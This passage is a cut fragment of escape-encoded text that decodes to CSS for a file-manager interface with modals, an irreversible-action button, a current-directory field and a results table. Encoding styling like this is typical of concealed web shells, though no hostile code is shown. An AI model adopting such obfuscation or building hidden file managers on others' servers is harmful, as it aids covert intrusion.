6\x61\x72\50\x2d\x2d\x62\147\55\x6d\x65\x64\51\x20\x30\x25\x2c\x20\166\x61\162\x28\55\x2d\x62\147\55\x6c\x69\147\x68\x74\x29\40\x31\x30\x30\x25\x29\73\xa\11\11\x9\142\x6f\170\55\x73\x68\141\x64\x6f\167\x3a\x20\60\40\61\x35\x70\170\x20\x34\x30\160\x78\40\x72\147\x62\x61\x28\x30\54\40\x30\x2c\40\60\x2c\40\x30\56\x35\x29\x3b\12\x9\x9\x9\157\166\145\x72\146\154\x6f\167\72\40\150\x69\144\x64\x65\x6e\x3b\xa\x9\11\x9\141\x6e\x69\155\x61\x74\151\157\x6e\x3a\x20\155\x6f\144\x61\154\123\x6c\151\x64\145\111\156\40\60\56\x33\163\40\143\165\x62\x69\143\x2d\142\145\x7a\x69\145\x72\50\x30\56\64\x2c\x20\60\x2c\40\x30\56\x32\54\x20\61\x29\x3b\12\11\x9\x7d\xa\11\x9\12\x9\x9\x40\153\x65\x79\146\x72\x61\x6d\x65\x73\40\x6d\x6f\144\141\154\123\154\151\144\145\x49\x6e\x20\173\xa\11\x9\x9\146\162\x6f\155\40\x7b\xa\11\x9\11\x9\x6f\x70\141\143\151\164\171\72\x20\x30\x3b\xa\11\11\x9\x9\x74\x72\x61\156\x73\146\157\162\155\72\x20\x74\x72\x61\x6e\x73\x6c\141\164\145\131\x28\55\x33\x30\160\x78\x29\x20\x73\143\141\154\145\50\60\x2e\x39\65\x29\x3b\12\11\11\x9\x7d\12\11\11\x9\164\157\x20\x7b\12\x9\x9\11\11\x6f\160\x61\x63\151\x74\171\x3a\x20\x31\x3b\xa\x9\x9\x9\x9\164\162\x61\156\163\146\157\162\155\x3a\40\164\x72\x61\156\x73\154\141\164\x65\131\x28\x30\x29\40\163\143\141\x6c\x65\50\x31\x29\73\xa\x9\x9\11\x7d\xa\x9\11\175\12\11\x9\12\11\11\x2e\151\x6e\160\x75\x74\55\x6d\x6f\144\x61\x6c\55\150\x65\141\144\145\162\x20\x7b\12\x9\x9\x9\x62\x61\143\153\147\x72\x6f\x75\x6e\x64\x3a\40\x6c\151\x6e\145\x61\162\55\x67\x72\141\144\x69\x65\156\x74\50\61\63\65\144\x65\147\54\40\x76\x61\x72\50\x2d\55\x61\x63\143\x65\156\164\x2d\x62\x6c\165\145\x29\40\60\x25\x2c\40\43\x39\144\143\x31\x66\146\x20\61\60\60\45\51\x3b\12\x9\11\x9\x70\x61\144\x64\x69\x6e\x67\72\40\61\56\65\x72\x65\155\73\12\11\x9\11\164\145\170\164\x2d\141\x6c\151\x67\x6e\72\x20\x63\x65\x6e\164\145\x72\x3b\xa\x9\x9\x9\142\157\x72\x64\x65\x72\x2d\142\157\x74\x74\x6f\x6d\72\x20\62\160\x78\40\163\157\x6c\x69\144\x20\x76\x61\162\x28\x2d\x2d\141\x63\143\145\156\164\x2d\x62\154\x75\x65\51\x3b\12\x9\11\x7d\xa\x9\11\xa\11\11\x2e\151\x6e\x70\x75\x74\x2d\x6d\x6f\x64\x61\154\55\x68\145\x61\144\x65\x72\40\x68\63\40\x7b\xa\x9\11\x9\x6d\141\162\x67\x69\156\72\40\x30\x3b\12\11\11\11\146\157\x6e\x74\55\x73\151\172\145\x3a\40\x31\x2e\x33\162\x65\155\x3b\xa\x9\11\11\143\157\x6c\x6f\x72\x3a\x20\166\141\x72\x28\x2d\x2d\x62\x67\55\144\141\x72\153\51\73\12\11\11\x9\x66\x6f\x6e\x74\55\167\x65\x69\147\150\164\x3a\40\67\60\x30\x3b\12\11\x9\11\144\151\163\x70\x6c\141\171\72\x20\x66\154\145\170\x3b\xa\x9\11\11\141\x6c\x69\x67\156\55\151\164\145\x6d\163\72\x20\143\145\x6e\x74\x65\x72\73\xa\11\x9\x9\x6a\x75\163\x74\x69\146\171\x2d\x63\157\x6e\164\x65\156\x74\72\x20\x63\x65\156\x74\145\162\73\xa\11\11\11\x67\141\160\x3a\40\60\x2e\65\162\x65\155\73\12\11\x9\175\12\x9\x9\xa\11\x9\x2e\151\x6e\160\x75\164\x2d\x6d\157\x64\x61\154\55\150\x65\x61\x64\x65\162\x20\56\143\154\157\x73\145\x20\x7b\12\x9\11\x9\x63\x6f\154\x6f\162\72\40\x76\141\x72\50\55\55\x62\x67\55\144\141\162\153\x29\x3b\xa\x9\11\x9\x66\x6f\156\x74\55\163\151\x7a\145\72\x20\x31\x2e\70\162\x65\155\x3b\12\11\x9\x9\157\x70\141\x63\151\x74\x79\x3a\40\60\x2e\70\73\12\x9\11\11\164\162\x61\156\x73\x69\164\151\x6f\x6e\72\40\x61\x6c\154\x20\60\x2e\x33\x73\x20\145\x61\163\x65\73\xa\11\11\x7d\12\11\x9\xa\x9\11\56\x69\156\x70\165\x74\55\x6d\157\x64\x61\x6c\55\150\145\141\144\x65\x72\40\56\143\154\157\x73\x65\x3a\x68\157\x76\145\x72\40\x7b\12\x9\x9\11\x6f\160\x61\143\x69\x74\x79\72\40\x31\73\xa\x9\11\11\143\157\x6c\157\162\72\40\166\141\162\50\55\x2d\141\143\x63\145\x6e\164\55\162\145\144\x29\73\12\x9\11\x9\164\162\x61\x6e\163\x66\157\162\155\72\40\x72\157\x74\x61\x74\145\x28\71\x30\x64\x65\x67\51\x3b\xa\11\11\175\xa\x9\11\12\x9\x9\56\x69\156\x70\x75\x74\x2d\x6d\x6f\144\141\154\x2d\x62\157\x64\171\x20\173\xa\11\11\11\x70\141\144\x64\151\156\x67\x3a\x20\x32\x72\145\155\x3b\xa\x9\11\11\164\145\170\x74\x2d\141\154\151\147\x6e\72\x20\143\x65\x6e\164\x65\x72\73\12\x9\11\175\12\x9\11\12\11\11\56\x69\x6e\x70\165\164\55\151\x63\157\x6e\x20\173\xa\x9\x9\11\146\157\156\164\55\x73\x69\x7a\x65\x3a\40\64\x72\x65\x6d\x3b\12\x9\11\x9\155\x61\x72\x67\151\156\55\142\157\x74\164\157\x6d\x3a\x20\61\162\x65\x6d\x3b\12\11\11\11\141\156\151\155\x61\164\151\157\156\x3a\40\160\x75\154\163\145\x20\62\163\40\x65\141\x73\145\55\151\x6e\55\157\165\164\40\x69\x6e\x66\x69\156\151\164\x65\73\12\11\x9\x7d\xa\x9\x9\xa\x9\11\56\x69\156\160\x75\x74\x2d\154\x61\x62\x65\154\40\x7b\12\x9\11\11\x63\x6f\154\x6f\x72\72\x20\166\141\x72\50\x2d\x2d\164\145\x78\x74\55\x6c\151\147\x68\x74\51\x3b\xa\11\11\x9\146\x6f\x6e\x74\55\x73\151\172\145\x3a\40\x31\x72\x65\x6d\73\xa\x9\11\x9\x6d\141\162\147\x69\156\55\142\x6f\x74\164\x6f\x6d\72\40\61\x72\145\x6d\73\12\x9\x9\x9\146\x6f\x6e\x74\x2d\167\x65\x69\147\150\x74\72\x20\x35\60\60\x3b\xa\11\11\x7d\xa\x9\x9\12\x9\11\x2e\151\156\160\165\164\55\146\151\x65\154\x64\40\173\xa\11\11\11\167\151\144\164\150\x3a\x20\x31\60\x30\45\73\12\x9\x9\11\160\x61\x64\x64\x69\x6e\147\x3a\x20\x31\162\145\x6d\x3b\xa\11\11\x9\x62\157\x72\144\x65\x72\72\x20\62\160\x78\x20\163\157\154\151\144\x20\x76\141\x72\x28\x2d\x2d\x62\x6f\x72\x64\145\162\x2d\143\157\x6c\x6f\x72\51\x3b\xa\11\x9\11\142\157\162\144\145\162\55\x72\141\144\x69\165\163\x3a\40\70\x70\x78\x3b\12\11\x9\11\142\x61\x63\x6b\147\x72\x6f\165\156\144\x3a\x20\166\141\162\50\x2d\x2d\142\x67\x2d\144\x61\x72\153\51\73\xa\x9\11\11\x63\157\154\157\162\x3a\x20\166\141\x72\50\55\55\x74\145\x78\x74\x2d\x6c\151\x67\150\164\51\73\xa\x9\11\11\x66\x6f\x6e\x74\x2d\x73\151\x7a\145\x3a\40\x31\162\145\x6d\x3b\12\11\x9\x9\x66\x6f\x6e\x74\55\x66\141\x6d\x69\x6c\171\x3a\40\x76\x61\x72\x28\x2d\55\146\x6f\156\x74\55\146\141\155\x69\x6c\171\51\73\12\11\11\x9\164\x72\141\x6e\163\151\x74\151\x6f\x6e\72\40\141\154\154\40\60\56\63\163\x20\145\141\x73\x65\73\12\x9\x9\x9\155\x61\162\x67\x69\156\55\142\x6f\x74\x74\x6f\x6d\x3a\x20\60\x2e\x35\x72\x65\155\73\xa\x9\x9\x9\142\x6f\170\55\163\x69\x7a\151\156\x67\x3a\40\x62\157\162\144\x65\x72\x2d\142\x6f\x78\x3b\xa\11\11\175\xa\x9\11\xa\11\x9\56\x69\x6e\x70\x75\x74\55\146\151\145\154\x64\x3a\146\x6f\143\165\163\x20\x7b\12\11\11\11\x6f\165\x74\154\x69\156\145\72\x20\x6e\x6f\156\145\x3b\12\11\x9\x9\x62\x6f\x72\x64\x65\162\x2d\143\x6f\154\157\x72\x3a\40\x76\x61\162\x28\x2d\55\x61\x63\x63\x65\x6e\164\x2d\x62\x6c\165\x65\51\x3b\12\11\11\11\x62\157\170\x2d\163\150\141\144\157\x77\72\40\60\x20\x30\x20\x30\x20\63\160\170\40\162\x67\142\x61\x28\61\63\x30\54\40\x31\x37\60\54\40\62\65\65\54\40\60\x2e\x32\51\x3b\xa\11\x9\11\164\162\x61\156\x73\x66\x6f\162\x6d\72\40\164\x72\141\x6e\163\154\x61\x74\x65\x59\x28\55\x32\x70\170\x29\x3b\12\11\x9\175\12\x9\x9\12\x9\11\x2e\x69\156\x70\165\164\x2d\x65\162\162\x6f\162\x20\x7b\12\x9\x9\x9\x63\157\154\157\x72\x3a\x20\166\x61\162\x28\55\55\x61\x63\143\145\156\x74\x2d\x72\145\144\x29\73\xa\11\11\11\146\157\156\164\x2d\163\151\172\x65\x3a\40\x30\x2e\x39\x72\145\x6d\x3b\12\x9\11\11\155\151\x6e\55\x68\x65\x69\147\150\x74\x3a\x20\61\56\x35\x72\145\155\73\xa\11\11\11\x6d\141\x72\147\151\156\55\x62\x6f\x74\164\157\x6d\72\40\x31\x72\145\x6d\73\xa\x9\x9\11\x6f\x70\141\x63\151\164\x79\72\x20\x30\73\12\x9\11\x9\x74\x72\141\156\x73\x69\164\151\x6f\x6e\72\40\157\x70\x61\x63\151\x74\171\x20\x30\x2e\x33\163\40\x65\141\163\145\x3b\12\x9\11\x7d\12\11\x9\12\11\x9\x2e\151\156\160\x75\164\55\145\162\x72\x6f\x72\56\x73\x68\x6f\167\40\173\xa\11\x9\x9\x6f\160\141\143\151\x74\x79\x3a\40\61\73\xa\x9\11\175\xa\x9\11\12\x9\11\56\x69\x6e\x70\x75\164\55\155\x6f\x64\x61\x6c\55\x61\x63\x74\151\x6f\x6e\163\40\x7b\xa\x9\x9\11\x64\151\x73\x70\154\x61\171\x3a\40\x66\154\x65\170\73\12\x9\x9\x9\x67\x61\160\72\40\x31\x72\x65\x6d\73\12\11\x9\x9\152\165\163\x74\151\x66\x79\x2d\143\157\156\164\x65\156\164\72\40\x63\145\x6e\x74\x65\162\73\12\11\11\x9\x6d\141\x72\147\151\x6e\x2d\x74\x6f\x70\72\40\61\56\x35\162\145\x6d\73\xa\x9\11\175\12\x9\11\12\11\x9\56\151\156\160\x75\164\55\142\164\x6e\55\x63\x61\x6e\x63\x65\x6c\x2c\xa\x9\11\56\151\x6e\160\x75\164\x2d\142\x74\156\x2d\157\x6b\40\x7b\xa\x9\11\x9\x70\141\144\x64\151\x6e\147\72\x20\60\x2e\70\x35\162\x65\x6d\x20\62\x72\x65\155\x3b\12\11\11\x9\x62\x6f\x72\144\x65\162\72\40\x6e\x6f\x6e\145\73\12\x9\11\11\142\157\162\x64\x65\x72\x2d\x72\141\x64\x69\x75\x73\x3a\x20\70\160\x78\73\12\11\11\11\x66\x6f\156\x74\x2d\x73\x69\x7a\x65\x3a\x20\x31\162\145\x6d\x3b\12\x9\x9\11\x66\157\x6e\x74\x2d\x77\145\x69\x67\150\164\x3a\x20\66\60\x30\73\12\11\11\x9\x63\165\x72\163\x6f\162\x3a\x20\x70\x6f\151\x6e\x74\x65\x72\73\12\11\11\x9\164\162\x61\x6e\163\151\164\x69\x6f\x6e\72\40\x61\x6c\x6c\40\x30\x2e\63\163\x20\x63\x75\x62\151\143\55\142\145\x7a\x69\145\162\x28\60\x2e\x34\54\x20\x30\x2c\x20\x30\x2e\62\x2c\40\x31\51\73\xa\11\11\11\x66\x6f\156\164\x2d\x66\x61\x6d\151\x6c\171\x3a\40\166\141\x72\50\x2d\55\x66\x6f\156\164\55\146\x61\155\151\x6c\171\x29\73\xa\11\11\x9\x6d\x69\x6e\55\167\x69\x64\x74\150\72\40\x31\x32\60\160\x78\x3b\12\11\x9\11\x70\x6f\x73\151\164\151\x6f\x6e\72\40\162\145\x6c\x61\164\x69\x76\145\x3b\xa\11\x9\x9\157\166\145\162\x66\x6c\157\167\x3a\40\x68\151\144\144\145\x6e\73\xa\x9\x9\x7d\12\11\11\12\x9\11\x2e\x69\156\160\165\x74\x2d\x62\x74\x6e\x2d\143\141\x6e\x63\x65\154\40\173\12\11\x9\11\142\x61\x63\x6b\x67\x72\157\165\156\144\x3a\40\x6c\151\x6e\x65\141\x72\55\147\162\x61\x64\151\x65\x6e\x74\x28\x31\x33\x35\x64\145\x67\x2c\x20\x76\141\x72\50\x2d\x2d\142\x67\55\154\x69\147\x68\x74\51\40\60\x25\x2c\40\x76\141\162\50\x2d\x2d\x62\147\55\155\145\144\51\x20\x31\60\60\45\x29\73\xa\x9\11\11\143\x6f\x6c\x6f\x72\x3a\x20\x76\x61\x72\50\55\x2d\164\145\170\164\55\x6c\x69\x67\x68\x74\x29\x3b\xa\11\x9\11\x62\157\x72\144\145\162\72\40\x32\x70\170\40\163\x6f\154\x69\x64\40\x76\141\x72\50\x2d\x2d\142\157\162\144\145\162\x2d\143\x6f\154\x6f\x72\x29\x3b\12\11\11\11\x62\x6f\x78\x2d\x73\150\141\144\x6f\x77\x3a\x20\x30\x20\64\160\x78\x20\61\65\160\170\x20\x72\147\x62\x61\50\60\x2c\40\60\54\x20\x30\x2c\x20\60\56\62\51\73\xa\11\x9\175\xa\x9\11\xa\11\x9\56\151\x6e\x70\165\164\55\142\164\156\x2d\x63\141\156\143\x65\154\x3a\x68\157\166\145\x72\40\173\xa\11\x9\x9\x62\x61\143\153\147\162\x6f\x75\156\x64\x3a\x20\166\x61\162\x28\x2d\55\x62\x67\x2d\x64\141\x72\x6b\x29\73\12\x9\x9\x9\x62\157\x72\144\145\x72\55\143\157\154\x6f\162\72\x20\x76\141\x72\50\55\55\164\145\170\x74\x2d\x6d\x65\144\51\73\12\x9\11\x9\164\162\x61\156\x73\146\x6f\x72\155\72\40\164\x72\141\x6e\163\x6c\x61\164\145\131\50\55\62\x70\170\x29\73\xa\11\x9\11\x62\x6f\170\55\x73\x68\x61\144\x6f\x77\x3a\40\60\40\x36\160\170\40\x32\x30\x70\x78\40\162\x67\x62\x61\x28\60\x2c\40\60\54\x20\60\54\x20\x30\x2e\x33\x29\73\xa\11\11\x7d\12\x9\x9\12\x9\x9\56\151\x6e\160\x75\x74\55\142\x74\156\x2d\143\x61\156\x63\145\x6c\x3a\141\x63\164\151\166\145\x20\x7b\xa\x9\x9\11\164\162\x61\156\x73\x66\157\162\155\72\40\x74\162\141\156\163\154\141\x74\145\x59\50\60\51\73\12\11\x9\x7d\xa\x9\11\xa\11\11\56\x69\156\160\165\x74\55\x62\x74\x6e\55\157\x6b\x20\x7b\xa\x9\11\x9\x62\x61\x63\153\x67\162\x6f\x75\x6e\144\72\40\154\x69\156\145\141\x72\x2d\147\162\x61\x64\x69\145\x6e\x74\x28\x31\x33\x35\144\x65\x67\54\40\166\141\162\x28\55\55\141\x63\143\145\156\164\x2d\x62\154\x75\145\51\x20\x30\45\x2c\x20\x23\71\144\x63\61\146\x66\x20\x31\60\x30\45\51\73\xa\11\11\11\x63\x6f\154\157\x72\x3a\x20\166\x61\x72\50\55\55\142\147\55\x64\141\162\153\x29\73\12\11\11\11\x62\x6f\x78\x2d\x73\150\141\x64\157\167\x3a\40\60\x20\64\x70\x78\x20\x31\x35\160\x78\40\x72\147\142\141\50\x31\x33\60\54\40\x31\x37\x30\54\x20\62\x35\65\x2c\x20\60\56\64\x29\x3b\12\x9\x9\x7d\xa\11\11\xa\11\11\x2e\151\156\x70\x75\x74\55\x62\164\156\x2d\157\153\x3a\x68\157\166\145\162\x20\x7b\12\11\11\x9\164\162\x61\x6e\163\146\157\x72\155\72\x20\164\162\x61\x6e\163\154\x61\164\145\131\50\55\62\x70\170\x29\x3b\12\11\11\11\x62\x6f\x78\x2d\x73\x68\x61\144\157\x77\x3a\40\60\40\x36\160\170\x20\62\60\x70\x78\x20\x72\x67\x62\x61\50\x31\63\x30\54\x20\61\x37\x30\54\40\x32\65\x35\54\40\60\56\x36\x29\73\12\11\x9\x7d\12\11\11\xa\11\11\x2e\151\x6e\160\165\x74\x2d\142\x74\x6e\55\157\153\x3a\x61\143\164\x69\x76\x65\x20\x7b\xa\11\x9\x9\164\x72\x61\x6e\x73\146\157\162\155\x3a\40\x74\x72\x61\156\163\154\141\x74\x65\131\x28\60\x29\x3b\xa\x9\x9\175\12\x9\11\12\x9\11\56\x69\156\x70\x75\164\55\x62\164\x6e\x2d\157\x6b\x3a\144\x69\x73\x61\142\154\x65\144\40\x7b\xa\11\11\x9\157\160\141\143\x69\164\x79\72\x20\x30\56\66\73\12\x9\11\x9\143\x75\x72\x73\157\162\x3a\x20\x6e\157\x74\55\141\x6c\x6c\x6f\x77\145\x64\73\xa\x9\11\11\x74\162\x61\x6e\163\146\x6f\162\155\x3a\40\x6e\157\156\x65\x3b\xa\11\11\175\xa\11\11\xa\x9\11\56\x69\x72\x72\x65\166\145\x72\x73\x69\x62\154\x65\55\142\x74\156\x2d\x63\x61\156\x63\x65\154\x20\173\12\11\x9\11\x62\x61\143\x6b\x67\x72\157\165\156\x64\x3a\x20\154\151\156\145\141\162\x2d\147\162\141\144\x69\145\156\164\x28\61\63\x35\144\x65\147\x2c\x20\x76\141\162\50\x2d\x2d\142\x67\x2d\x6c\x69\x67\x68\x74\x29\40\60\45\x2c\40\x76\x61\162\50\55\x2d\142\x67\55\x6d\145\144\x29\x20\x31\60\60\45\51\73\12\x9\11\11\x63\x6f\154\157\162\72\40\x76\x61\162\50\55\55\164\145\170\x74\x2d\x6c\151\147\x68\x74\x29\x3b\xa\11\11\x9\142\157\x72\x64\145\x72\72\40\62\x70\x78\x20\x73\157\154\x69\144\40\166\141\162\x28\55\x2d\142\157\x72\144\145\x72\x2d\143\157\154\x6f\162\x29\x3b\12\11\11\x9\x62\157\x78\55\163\150\141\144\157\x77\x3a\40\x30\40\x34\x70\170\40\x31\x35\x70\170\40\x72\x67\x62\141\50\60\54\x20\x30\x2c\40\60\54\40\60\56\x33\x29\x3b\xa\x9\x9\x7d\xa\x9\11\xa\x9\11\56\151\162\162\x65\166\145\x72\163\151\142\x6c\x65\55\x62\x74\x6e\55\143\x61\156\x63\145\x6c\x3a\150\157\166\145\162\40\x7b\xa\x9\x9\11\x62\141\x63\x6b\x67\162\157\165\156\x64\72\40\154\x69\156\x65\141\162\x2d\x67\x72\141\x64\x69\x65\x6e\x74\50\61\63\x35\144\x65\147\x2c\x20\x76\141\162\50\x2d\55\x62\x67\55\x6d\x65\144\x29\x20\60\45\x2c\x20\166\x61\162\x28\55\55\142\x67\55\154\x69\x67\150\x74\51\40\x31\60\60\x25\x29\73\12\x9\x9\11\x74\x72\x61\156\x73\x66\157\162\155\72\40\164\x72\x61\156\163\154\x61\164\145\131\x28\x2d\x33\160\170\51\73\xa\11\x9\x9\142\x6f\170\x2d\163\x68\x61\x64\x6f\x77\x3a\x20\60\x20\66\160\170\x20\62\60\x70\x78\x20\x72\147\x62\141\50\x30\54\x20\x30\x2c\x20\60\54\40\60\x2e\64\51\73\12\11\11\175\12\11\11\xa\x9\11\x2e\x69\x72\x72\x65\x76\145\162\x73\x69\142\154\x65\55\x62\x74\156\x2d\x63\157\156\x66\151\162\x6d\x20\173\xa\x9\11\11\142\x61\x63\153\147\162\x6f\165\156\x64\x3a\x20\154\x69\156\145\141\162\x2d\147\x72\x61\x64\151\x65\x6e\164\x28\x31\x33\x35\x64\x65\x67\54\x20\x23\x64\x63\63\65\x34\x35\40\x30\45\54\x20\x23\143\x38\x32\63\63\63\40\65\60\x25\x2c\40\x23\x62\144\62\x31\x33\x30\x20\61\x30\60\45\51\73\xa\x9\11\11\143\x6f\x6c\x6f\162\x3a\40\x23\x66\x66\146\x66\146\x66\73\xa\11\11\x9\142\x6f\162\144\145\x72\x3a\x20\x32\160\x78\x20\x73\x6f\154\151\x64\40\162\x67\x62\x61\50\62\x35\x35\54\40\x32\65\x35\54\40\x32\65\x35\54\x20\x30\x2e\63\x29\x3b\xa\x9\11\x9\142\157\x78\55\x73\150\141\x64\x6f\167\72\40\60\40\x34\x70\170\x20\62\x30\x70\170\40\162\x67\x62\141\50\x32\x32\60\x2c\40\65\x33\x2c\x20\66\x39\54\40\x30\x2e\66\x29\x2c\xa\x9\x9\x9\11\x9\11\60\x20\x30\40\63\x30\x70\x78\40\x72\147\142\x61\50\x32\x32\60\x2c\x20\65\63\54\40\66\71\54\40\60\x2e\x34\51\x2c\xa\11\x9\x9\11\11\x9\x69\x6e\163\x65\x74\40\x30\x20\61\x70\170\40\60\40\x72\x67\142\x61\x28\62\65\65\x2c\x20\62\x35\65\x2c\x20\62\65\65\54\40\60\56\62\51\73\xa\x9\x9\x9\x61\156\x69\x6d\141\x74\x69\157\156\x3a\x20\x63\x6f\156\x66\x69\x72\155\120\165\154\x73\145\x20\62\163\40\145\141\x73\x65\x2d\x69\x6e\55\157\165\164\x20\151\156\146\x69\156\151\164\x65\73\xa\x9\x9\x7d\12\11\x9\12\11\x9\x40\153\x65\x79\146\162\141\155\145\163\x20\x63\x6f\156\146\x69\162\155\120\x75\154\163\x65\x20\173\xa\11\11\x9\60\45\x2c\40\61\60\60\x25\x20\x7b\xa\x9\11\11\x9\x62\157\170\x2d\x73\150\x61\144\x6f\167\72\x20\60\x20\64\160\170\40\x32\60\160\170\x20\x72\147\x62\x61\x28\x32\62\x30\x2c\40\x35\63\x2c\40\66\x39\54\40\x30\56\66\x29\54\12\11\x9\11\x9\11\x9\11\60\40\60\40\63\60\160\170\40\162\147\x62\x61\x28\x32\62\60\x2c\x20\65\x33\x2c\x20\x36\71\54\x20\x30\56\64\x29\x2c\xa\11\11\x9\x9\x9\x9\11\x69\156\163\x65\164\40\60\40\61\160\x78\40\x30\x20\x72\147\x62\x61\50\x32\65\65\54\x20\62\x35\65\54\40\x32\x35\65\x2c\40\x30\x2e\x32\51\x3b\12\x9\x9\x9\x7d\xa\x9\11\11\65\x30\x25\40\x7b\xa\11\11\x9\11\142\157\x78\55\x73\x68\x61\x64\x6f\x77\72\40\x30\x20\64\x70\170\x20\x33\60\x70\x78\x20\162\147\x62\141\50\x32\x32\x30\54\40\65\63\54\40\x36\x39\x2c\40\60\56\70\51\54\xa\x9\11\x9\x9\11\11\x9\60\x20\60\x20\65\x30\160\170\40\x72\147\142\x61\x28\x32\x32\x30\x2c\x20\x35\x33\54\40\66\x39\54\x20\x30\56\x36\51\x2c\12\11\x9\x9\11\x9\11\x9\151\x6e\x73\x65\164\40\x30\40\61\160\x78\x20\60\x20\x72\x67\x62\141\x28\x32\65\x35\x2c\40\62\x35\x35\x2c\40\x32\x35\65\x2c\x20\60\56\x33\51\73\xa\11\x9\x9\175\xa\11\11\175\xa\11\x9\12\11\x9\56\x69\x72\x72\145\x76\145\162\163\151\142\x6c\145\55\x62\x74\x6e\x2d\x63\x6f\156\x66\x69\162\155\x3a\72\x62\x65\146\x6f\x72\x65\40\x7b\12\x9\11\x9\x63\x6f\156\x74\x65\x6e\164\x3a\x20\x27\47\x3b\12\11\11\x9\x70\157\163\151\x74\151\x6f\x6e\x3a\x20\x61\x62\163\x6f\154\165\x74\x65\x3b\xa\x9\x9\11\x74\157\160\72\40\60\73\xa\11\11\11\x6c\x65\x66\164\72\40\55\61\x30\60\x25\73\xa\x9\11\x9\167\151\144\x74\150\72\40\x31\60\60\x25\x3b\xa\11\x9\11\150\x65\151\147\x68\164\72\x20\61\x30\x30\x25\x3b\12\11\11\x9\142\141\x63\153\x67\162\157\x75\156\144\x3a\40\154\x69\x6e\x65\x61\x72\55\147\162\x61\144\151\x65\156\164\x28\71\x30\x64\145\147\54\x20\x74\162\x61\x6e\x73\160\141\x72\x65\156\x74\54\40\162\x67\x62\x61\x28\62\x35\x35\54\x20\62\x35\65\x2c\x20\x32\65\65\x2c\40\x30\x2e\x33\51\x2c\40\x74\162\x61\x6e\x73\160\141\x72\145\156\x74\51\73\xa\11\11\x9\x74\x72\x61\156\x73\x69\x74\151\157\x6e\72\40\154\145\146\x74\40\x30\56\x35\x73\73\xa\11\11\175\xa\11\11\xa\x9\11\56\x69\162\162\145\x76\145\162\x73\151\x62\154\145\x2d\142\x74\x6e\55\143\157\156\146\151\162\x6d\x3a\150\x6f\166\x65\x72\x3a\x3a\x62\x65\146\157\x72\x65\x20\173\12\x9\11\x9\154\x65\146\x74\72\x20\61\x30\x30\45\73\xa\x9\11\175\12\11\x9\xa\11\11\56\x69\162\x72\x65\x76\x65\162\163\151\x62\154\x65\x2d\142\164\x6e\x2d\143\157\x6e\x66\151\162\155\x3a\x68\157\x76\145\x72\40\173\12\x9\x9\11\142\141\143\153\x67\x72\157\x75\x6e\x64\72\x20\154\151\x6e\x65\x61\x72\55\x67\x72\141\x64\151\x65\x6e\x74\50\61\x33\65\x64\x65\147\54\x20\43\x65\x36\x33\71\64\66\x20\60\45\x2c\40\x23\x64\x36\62\70\x33\x39\40\x35\x30\x25\x2c\40\43\x63\70\62\x33\x33\63\40\x31\60\60\45\x29\73\xa\x9\11\x9\x74\x72\x61\156\163\146\x6f\162\x6d\x3a\40\x74\x72\x61\x6e\x73\154\141\x74\145\131\x28\x2d\63\x70\170\51\40\x73\x63\x61\x6c\145\50\61\x2e\60\x35\x29\x3b\12\x9\11\x9\x62\157\x78\x2d\x73\150\141\144\157\x77\x3a\x20\x30\40\x36\x70\170\x20\x33\60\x70\170\40\x72\x67\x62\x61\x28\x32\x32\x30\x2c\x20\65\x33\x2c\40\66\x39\x2c\x20\x30\x2e\x38\51\54\xa\x9\11\11\11\x9\11\60\x20\60\40\66\x30\x70\170\x20\x72\x67\142\x61\50\62\x32\x30\x2c\x20\65\63\x2c\x20\x36\71\54\x20\x30\x2e\x36\51\54\12\11\x9\11\x9\11\11\151\x6e\163\x65\x74\40\x30\x20\61\x70\170\40\60\40\x72\147\x62\x61\50\x32\x35\65\x2c\40\62\x35\65\54\x20\x32\65\x35\x2c\40\60\x2e\63\x29\x3b\xa\x9\11\175\xa\11\11\12\11\11\56\151\162\x72\145\x76\x65\162\x73\x69\x62\154\145\x2d\x62\164\x6e\55\x63\x6f\x6e\146\151\x72\x6d\72\x61\x63\164\151\166\145\x20\x7b\xa\11\11\11\x74\162\141\156\x73\x66\x6f\x72\155\x3a\40\x74\162\141\156\x73\154\141\164\145\131\50\55\61\x70\x78\x29\x20\x73\143\141\x6c\x65\50\61\x2e\60\x32\x29\x3b\12\x9\11\11\142\157\x78\x2d\163\x68\141\x64\x6f\x77\x3a\40\x30\40\62\160\x78\x20\x31\x35\160\170\40\162\147\142\x61\50\62\62\x30\x2c\x20\x35\x33\x2c\x20\x36\71\54\40\x30\x2e\66\51\54\xa\11\11\x9\11\x9\11\x69\156\x73\x65\164\40\60\x20\62\160\x78\x20\64\x70\x78\40\x72\147\x62\x61\50\60\54\x20\x30\54\x20\60\x2c\40\60\56\x33\x29\x3b\12\11\11\x7d\12\11\11\12\11\x9\56\x69\x72\x72\x65\166\145\162\163\x69\x62\x6c\x65\x2d\x62\164\x6e\55\x63\157\156\146\151\x72\x6d\72\146\x6f\x63\165\x73\40\x7b\xa\x9\11\x9\157\x75\164\154\151\x6e\145\72\x20\x6e\x6f\156\145\x3b\xa\11\x9\11\142\x6f\x78\55\163\x68\141\144\157\167\72\x20\x30\x20\x34\x70\170\x20\62\x30\160\170\x20\162\x67\142\141\x28\62\x32\x30\x2c\x20\65\x33\54\x20\x36\x39\x2c\40\60\56\x36\51\x2c\xa\11\11\x9\x9\11\x9\60\x20\60\x20\63\60\x70\170\x20\162\147\142\141\50\x32\x32\x30\54\40\65\63\54\40\x36\71\x2c\40\x30\56\x34\x29\54\xa\x9\11\11\11\x9\x9\60\x20\x30\x20\60\x20\x34\x70\170\40\x72\147\x62\141\50\x32\x32\60\x2c\x20\65\63\54\40\66\71\x2c\x20\60\56\x34\51\73\xa\11\x9\x7d\12\x9\11\xa\40\x9\x9\56\146\x69\x6c\145\x2d\x6d\x61\156\x61\x67\x65\162\55\143\x6f\x6e\x74\x72\x6f\154\x73\x20\173\40\144\151\163\x70\x6c\x61\171\72\40\146\154\145\170\x3b\40\x6a\x75\163\x74\x69\x66\x79\x2d\143\157\156\164\145\x6e\x74\72\40\x73\x70\x61\x63\145\55\142\145\164\167\145\x65\156\x3b\x20\141\154\x69\x67\x6e\x2d\x69\x74\x65\x6d\163\x3a\x20\x63\145\x6e\164\x65\162\x3b\x20\x7d\xa\x20\x9\x9\43\143\x77\x64\40\173\x20\x66\x6c\145\170\x2d\147\162\157\167\72\x20\61\x3b\x20\x6d\x61\162\x67\x69\x6e\55\162\x69\147\x68\164\x3a\40\x31\x72\145\x6d\73\x20\x7d\12\x20\x9\x9\56\x72\x65\x73\x75\154\x74\x73\55\164\x61\x62\x6c\145\x20\173\x20\167\151\x64\x74\150\x3a\x20\x31\60\x30\x25\x3b\40\142\x6f\162\144\145\x72\55\x63\x6f\154\154\141\160\x73\x65\x3a\x